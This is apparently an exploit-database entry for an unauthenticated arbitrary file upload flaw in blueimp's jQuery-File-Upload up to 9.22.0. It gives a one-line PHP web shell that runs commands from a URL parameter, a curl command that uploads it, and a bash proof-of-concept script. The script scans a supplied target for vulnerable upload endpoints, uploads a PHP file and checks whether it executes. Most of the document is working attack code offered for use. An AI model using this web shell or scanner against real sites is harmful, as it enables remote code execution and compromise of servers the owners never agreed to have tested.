# Title: jQuery-File-Upload 9.22.0 - Arbitrary File Upload
# Author: Larry W. Cashdollar, @_larry0
# Date: 2018-10-09
# Vendor: https://github.com/blueimp
# Download Site: https://github.com/blueimp/jQuery-File-Upload/releases
# CVE-ID: N/A

# Vulnerability:
# The code in https://github.com/blueimp/jQuery-File-Upload/blob/master/server/php/UploadHandler.php 
# doesn't require any validation to upload files to the server.  It also doesn't exclude file types.  
# This allows for remote code execution.

# shell.php:
<?php $cmd=$_GET['cmd']; system($cmd);?>

# Exploit Code:
$ curl -F "files=@shell.php" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php


#!/bin/bash 



USERAGENT="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"

PATHS=("server/php/upload.class.php" "example/upload.php" "server/php/UploadHandler.php" "php/index.php")

MALICIOUS_FILE="$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 12 | head -n 1).php"



# What is added in this exploit from the original version

# - a bit of refactoring

# - automatically request the right filename if it already exists on server ex: 'file (1).php'

# - Try to detect plugin version,

# - Try to detect index.html (allowing files upload via gui)



# Checking curl & jq



curl -h &>/dev/null

if [ $? -ne 0 ]; then

    echo "[!] Please install curl."

    echo "# apt install curl"

    exit 1

fi



jq -h &>/dev/null

if [ $? -ne 0 ]; then

    echo "[!] Please install jq."

    echo "# apt install jq"

    exit 1

fi



# Checking url



if [ -z $1 ]; then

    echo "[!] Please supply a target host as an argument."

    echo "$0 http://www.example.com"

    exit 1

fi



# Generating payload



echo "<?php echo \"it works\"; unlink(__FILE__); ?>" > ${MALICIOUS_FILE}

echo  "________________________________________________________________________________"

echo  "|PoC Exploit for Blueimp's jQuery File Uploader CVE-2018-9206"

echo  "|Checks for older versions of the code and upload an harmless file."

echo  "|"

echo  "| @_larry0, @phackt_ul"

echo  "|Works for version <= 9.22.0 and with Apache > 2.3.9 (AllowOverride None)."

echo  "---/"

echo

echo  "[+] Checking variations :"



# Creating alias



curl='curl --connect-timeout 10 -sk -A "${USERAGENT}"'



index=-1

found=0



# Looking for upload php class file



for x in ${PATHS[@]}; do

    echo "[*] Testing... -> $1/$x"

    ${curl} -i "$1/$x" | head -1 | grep 200 &>/dev/null



    if [ $? -eq 0 ]; then

        echo "[+] Found Path: $x"

        index=$((${index}+1))

        found=1

        break;

    fi;



    index=$((${index}+1))



done



# Determining the exploit path according to the jquery version



exploit_path=""



if [ ${index} -eq 0 -o ${index} -eq 2 ];then

    exploit_path="server/php/index.php"

fi



if [ ${index} -eq 1 ];then

    exploit_path="example/upload.php"

fi



if [ ${index} -eq 3 ];then

    exploit_path="php/index.php"

fi



if [ ${found} -ne 1 ]; then

    echo "[!] ### Error: A vulnerable jQuery-File-Upload plugin was not found!"

    exit 1

fi



# Trying to detect bower.json, package.json



version_files=("bower.json package.json")



for x in ${version_files[@]}; do

    version=`${curl} "$1/$x" | jq -r .version`

    if [ "X" != "X""${version}" ]; then

        echo "[!] Found: Plugin version ${version}"

        break;

    fi

done



# Trying to detect index.html



${curl} "$1/index.html" | grep -i "jquery file upload" &>/dev/null



if [ $? -eq 0 ]; then

    echo "[!] Found: $1/index.html is accessible"

fi



# Uploading payload



res=""

echo "[+] Running ${curl} -F \"files[]=@${MALICIOUS_FILE}\" -F \"filename=${MALICIOUS_FILE}\" \"$1/${exploit_path}\""



filename=`${curl} -F "files[]=@${MALICIOUS_FILE}" -F "filename=${MALICIOUS_FILE}" "$1/${exploit_path}" | jq -r .files[].name`



if [ "X""${filename}" == "X" ]; then

    echo "[!] It seems that we had a false positive! :("

    exit 1

fi



filename=`echo "$filename" | sed 's/ /%20/g'`



# Trying to see if victim has been exploited



echo "[+] Testing path: $1/$(dirname ${exploit_path})/files/${filename}"

res=`${curl} "$1/$(dirname ${exploit_path})/files/${filename}"`



if [ "${res}" == "it works" ]; then

    echo "[!] Found: $1 is vulnerable"

else

    echo "[+] Seems not vulnerable :("

fi



rm -f "${MALICIOUS_FILE}" &>/dev/null